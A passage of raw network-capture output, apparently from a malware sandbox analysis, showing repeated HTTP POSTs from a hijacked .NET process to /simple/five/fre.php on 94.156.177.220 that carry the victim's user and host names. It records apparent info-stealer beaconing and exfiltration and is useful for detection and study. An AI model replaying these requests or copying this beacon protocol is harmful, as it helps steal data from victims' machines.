Oct 25, 2024 19:51:45.704489946 CEST	248	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.774933100 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.774949074 CEST	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.774966955 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Oct 25, 2024 19:51:45.775042057 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49176	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:50.139506102 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 176 Connection: close
Oct 25, 2024 19:51:50.145220995 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus849224ALBUS-PCk0DE4229FCF97F5879F50F8FD32FqPF
Oct 25, 2024 19:51:51.113399029 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49177	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:51.609496117 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 176 Connection: close
Oct 25, 2024 19:51:51.616426945 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus849224ALBUS-PC+0DE4229FCF97F5879F50F8FD3q99iP
Oct 25, 2024 19:51:52.585231066 CEST	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49178	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:52.666205883 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:51:52.671652079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:51:53.648555040 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49179	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:53.902439117 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:51:53.908423901 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:51:55.136472940 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49180	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:55.324877977 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:51:55.330638885 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:51:56.284284115 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49181	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:56.428042889 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:51:56.433698893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:51:57.409168005 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49182	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:57.552912951 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:51:57.559758902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:51:58.522156954 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:51:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49183	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:51:59.251210928 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:51:59.256820917 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:00.220825911 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.22	49184	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:00.368541956 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:00.374097109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:01.343830109 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49185	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:01.489933968 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:01.495589972 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:02.484688044 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49186	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:02.919217110 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:02.924654961 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:03.890964985 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.22	49187	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:04.037992001 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:04.043801069 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:05.006691933 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.22	49188	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:05.177855015 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:05.183331013 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:06.184935093 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.22	49189	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:06.345585108 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:06.351135969 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:07.663984060 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.22	49190	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:07.818367958 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:07.823914051 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:08.793823004 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.22	49191	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:08.968086958 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:08.973694086 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:10.024930954 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.22	49192	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 19:52:10.373667002 CEST	246	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 508F6F5C Content-Length: 149 Connection: close
Oct 25, 2024 19:52:10.380036116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Oct 25, 2024 19:52:11.347244024 CEST	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 25 Oct 2024 17:52:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49193	94.156.177.220	80	3900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Timestamp	Bytes transferred	Direction	Data
